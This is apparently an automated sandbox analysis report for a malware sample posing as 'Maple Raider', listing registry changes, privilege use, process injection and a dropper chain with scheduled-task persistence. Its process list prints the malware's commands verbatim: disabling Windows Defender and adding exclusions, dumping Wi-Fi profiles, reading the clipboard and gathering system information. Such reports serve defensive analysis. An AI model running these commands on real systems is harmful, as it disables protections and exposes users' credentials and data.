Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1732035469" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\svchost.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (24 events)
N/A N/A C:\ProgramData\main.exe N/A (24 events)
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (3 events)
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe N/A (9 events)
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\main.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 212 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe
PID 212 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe
PID 4988 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe C:\Windows\system32\cmd.exe
PID 4988 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe C:\Windows\system32\cmd.exe
PID 408 wrote to memory of 3216 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\_MEI2122\Build.exe
PID 408 wrote to memory of 3216 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\_MEI2122\Build.exe
PID 408 wrote to memory of 3216 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\_MEI2122\Build.exe
PID 3216 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\_MEI2122\Build.exe C:\ProgramData\Microsoft\hacn.exe
PID 3216 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\_MEI2122\Build.exe C:\ProgramData\Microsoft\hacn.exe
PID 3216 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\_MEI2122\Build.exe C:\ProgramData\Microsoft\based.exe
PID 3216 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\_MEI2122\Build.exe C:\ProgramData\Microsoft\based.exe
PID 3980 wrote to memory of 4844 N/A C:\ProgramData\Microsoft\based.exe C:\ProgramData\Microsoft\based.exe
PID 3980 wrote to memory of 4844 N/A C:\ProgramData\Microsoft\based.exe C:\ProgramData\Microsoft\based.exe
PID 4796 wrote to memory of 648 N/A C:\ProgramData\Microsoft\hacn.exe C:\ProgramData\Microsoft\hacn.exe
PID 4796 wrote to memory of 648 N/A C:\ProgramData\Microsoft\hacn.exe C:\ProgramData\Microsoft\hacn.exe
PID 648 wrote to memory of 4924 N/A C:\ProgramData\Microsoft\hacn.exe C:\Windows\system32\cmd.exe
PID 648 wrote to memory of 4924 N/A C:\ProgramData\Microsoft\hacn.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 1972 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 1972 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 3404 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 3404 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 4636 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 4636 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 4044 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 4044 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4924 wrote to memory of 4980 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\_MEI47962\s.exe
PID 4924 wrote to memory of 4980 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\_MEI47962\s.exe
PID 4924 wrote to memory of 4980 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\_MEI47962\s.exe
PID 4844 wrote to memory of 4596 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 4596 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 2208 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 2208 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4596 wrote to memory of 4428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4596 wrote to memory of 4428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2208 wrote to memory of 3748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2208 wrote to memory of 3748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4844 wrote to memory of 4376 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 4376 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 1584 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 1584 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 976 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 976 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 1972 wrote to memory of 3116 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1972 wrote to memory of 3116 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4844 wrote to memory of 3556 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 3556 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 920 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 920 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 4768 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 4768 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 1692 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4844 wrote to memory of 1692 N/A C:\ProgramData\Microsoft\based.exe C:\Windows\system32\cmd.exe
PID 4044 wrote to memory of 4020 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4044 wrote to memory of 4020 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3404 wrote to memory of 1340 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3404 wrote to memory of 1340 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4980 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\_MEI47962\s.exe C:\ProgramData\main.exe
PID 4980 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\_MEI47962\s.exe C:\ProgramData\main.exe
PID 4636 wrote to memory of 1944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 4636 wrote to memory of 1944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 4768 wrote to memory of 2444 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 4768 wrote to memory of 2444 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 4376 wrote to memory of 864 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4376 wrote to memory of 864 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe

"C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe

"C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI2122\Build.exe -pbeznogym

C:\Users\Admin\AppData\Local\Temp\_MEI2122\Build.exe

C:\Users\Admin\AppData\Local\Temp\_MEI2122\Build.exe -pbeznogym

C:\ProgramData\Microsoft\hacn.exe

"C:\ProgramData\Microsoft\hacn.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc

C:\ProgramData\Microsoft\based.exe

"C:\ProgramData\Microsoft\based.exe"

C:\ProgramData\Microsoft\based.exe

"C:\ProgramData\Microsoft\based.exe"

C:\ProgramData\Microsoft\hacn.exe

"C:\ProgramData\Microsoft\hacn.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI47962\s.exe -pbeznogym

C:\Users\Admin\AppData\Local\Temp\_MEI47962\s.exe

C:\Users\Admin\AppData\Local\Temp\_MEI47962\s.exe -pbeznogym

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('join discord.gg/input for support', 0, 'INPUT v2', 48+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌‏   .scr'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌‏   .scr'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\ProgramData\main.exe

"C:\ProgramData\main.exe"

C:\Windows\system32\mshta.exe

